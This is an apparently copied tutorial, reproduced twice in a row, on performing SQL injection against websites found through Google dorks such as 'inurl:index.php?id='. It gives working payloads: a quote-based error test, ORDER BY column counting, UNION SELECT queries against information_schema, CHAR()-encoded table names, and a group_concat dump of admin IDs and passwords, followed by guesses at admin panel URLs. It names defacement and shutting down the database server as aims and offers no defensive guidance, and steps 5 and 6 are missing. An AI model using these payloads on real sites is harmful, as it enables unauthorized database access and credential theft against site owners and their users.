n this tutorial I'm going to discuss SQL Injection. SQLi is one of the popular web application hacking methods. Using an SQL Injection attack, an unauthorized person can access the database of the website. Attackers can extract the data from the Database.
What can a hacker do during and after an SQLi attack?
*ByPassing Logins
*Accessing secret data
*Modifying and defacing the website
*Shutting down the MySQL server
So, here we go.
Step 1: Finding Vulnerable Websites
To find a SQLi vulnerable website, you can use Google search by searching for certain keywords. Those keywords are often regerred as ''Google Dork''.
Copy one of the above keywords and paste it in the Google Search engine. We'll get alot of results. We have to visit these websites one by one to check if they are vulnerable.
![[Image: 314fb9160af31558daf23d42276652cd.png]](http://i.gyazo.com/314fb9160af31558daf23d42276652cd.png)
Step 2: Checking for Vulnerability
Now let's check if the target website is vulnerable to an SQLi attack. To check the vulnerability, add the single quotes (') at the end of the url and hit enter.
If the page remains in the same page or shows that the page is not found, then it's not vulnerable.
If you get an error like shown below, it means the website is actually vulnerable.
Step 3: Finding the number of columns:
Great, so we've found a website that is vulnerable to SQLi attacks. Our next step is to find the number of columns present in the targets database.
To do that, replace the single quotes with the ''order by #'' statement.
Change the # from 1, to 2, 3, 4, 5, 6, Untill you get the ''unknown column'' error.
If you get an error while trying the 8th number (the X amount), then the number of the last column is x-1.
If the above method fails to work for you, then try to add the ''--'' at the end of the statement.
Step 4: Find the vulnerable columns:
We have successfully discovered the number of columns present in the target database. Let's find the vulnerable column by trying the query ''union select columns_sequence''.
Change the id value to negative, so change it to id=2. Replace the columns_sequence with the number from 1 to x-1 (Number of columns) separated with commas.
For example, if the number of columns is 7, then the query is as the following:
If the above method is not working, use this:
Once you execute the query, it will display the vulnerable column.
We're going to choose the ''admin'' table.
Step 7: Finding the column name
Now we're going to replace the ''group_concat(table_name)'' with the ''group_concat(column_name)''
Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--
We have to convert the table name to MySQL CHAR() string.
So in order to do that, we need the HackBar add-on. Click here to install the Mozilla Firefox HackBar add-on.
Once you've installed the add-on, you can see a toolbar that wil look like the following one. If you're not able to see the Hackbar, press F9.
Select SQL -> MySQL -> MySQLChar() in the hackbar.
It will ask you to enter string that you want to convert into MySQLCHAR(). We want to convert the table name to MySQLChar. In our case the table name is ''admin''.
Now you can see the CHAR (Numbers separated with comma's) in the hack toolbar. Copy and paste the code at the end of the url instead of the ''mysqlchar''.
For example:
The above query will display the list of columns.
For example: admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc.
Now replace the replace group_concat(column_name) with group_concat(columnname1,0x3a,anothercolumnname2).
If the above query displays the ''column is not found'' error, then try another column name from the list.
If we are lucky, it will display the data stored in the database depending on your column name. For instance, username and password column will display the login credentials stored in the database.
Step 8: Finding the admin panel
Just try to access the admin panel with urls like below.
If you're lucky, you'll find the admin page using the above urls. You can use some kind of admin finder tools aswell.
This was everything, I hope you've learnt something from it and that you enjoyed reading it. If I explained something wrong, please correct me in the comments.
What can a hacker do during and after an SQLi attack?
*ByPassing Logins
*Accessing secret data
*Modifying and defacing the website
*Shutting down the MySQL server
So, here we go.
Step 1: Finding Vulnerable Websites
To find a SQLi vulnerable website, you can use Google search by searching for certain keywords. Those keywords are often regerred as ''Google Dork''.
Spoiler (Click to Hide)
Code:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=Copy one of the above keywords and paste it in the Google Search engine. We'll get alot of results. We have to visit these websites one by one to check if they are vulnerable.
Spoiler (Click to Hide)
Step 2: Checking for Vulnerability
Now let's check if the target website is vulnerable to an SQLi attack. To check the vulnerability, add the single quotes (') at the end of the url and hit enter.
Code:
http://www.victimsite.com/index.php?id=2'If the page remains in the same page or shows that the page is not found, then it's not vulnerable.
If you get an error like shown below, it means the website is actually vulnerable.
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1Step 3: Finding the number of columns:
Great, so we've found a website that is vulnerable to SQLi attacks. Our next step is to find the number of columns present in the targets database.
To do that, replace the single quotes with the ''order by #'' statement.
Change the # from 1, to 2, 3, 4, 5, 6, Untill you get the ''unknown column'' error.
Code:
http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/index.php?id=2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4If you get an error while trying the 8th number (the X amount), then the number of the last column is x-1.
If the above method fails to work for you, then try to add the ''--'' at the end of the statement.
Code:
http://www.victimsite.com/index.php?id=2 order by 1--Step 4: Find the vulnerable columns:
We have successfully discovered the number of columns present in the target database. Let's find the vulnerable column by trying the query ''union select columns_sequence''.
Change the id value to negative, so change it to id=2. Replace the columns_sequence with the number from 1 to x-1 (Number of columns) separated with commas.
For example, if the number of columns is 7, then the query is as the following:
Code:
http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--If the above method is not working, use this:
Code:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--Once you execute the query, it will display the vulnerable column.
Spoiler (Click to View)
We're going to choose the ''admin'' table.
Step 7: Finding the column name
Now we're going to replace the ''group_concat(table_name)'' with the ''group_concat(column_name)''
Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--
We have to convert the table name to MySQL CHAR() string.
So in order to do that, we need the HackBar add-on. Click here to install the Mozilla Firefox HackBar add-on.
Once you've installed the add-on, you can see a toolbar that wil look like the following one. If you're not able to see the Hackbar, press F9.
Select SQL -> MySQL -> MySQLChar() in the hackbar.
Spoiler (Click to View)
It will ask you to enter string that you want to convert into MySQLCHAR(). We want to convert the table name to MySQLChar. In our case the table name is ''admin''.
Spoiler (Click to View)
Now you can see the CHAR (Numbers separated with comma's) in the hack toolbar. Copy and paste the code at the end of the url instead of the ''mysqlchar''.
For example:
Code:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--The above query will display the list of columns.
For example: admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc.
Now replace the replace group_concat(column_name) with group_concat(columnname1,0x3a,anothercolumnname2).
Code:
http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--If the above query displays the ''column is not found'' error, then try another column name from the list.
If we are lucky, it will display the data stored in the database depending on your column name. For instance, username and password column will display the login credentials stored in the database.
Step 8: Finding the admin panel
Just try to access the admin panel with urls like below.
Code:
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/If you're lucky, you'll find the admin page using the above urls. You can use some kind of admin finder tools aswell.
This was everything, I hope you've learnt something from it and that you enjoyed reading it. If I explained something wrong, please correct me in the comments.
No comments:
Post a Comment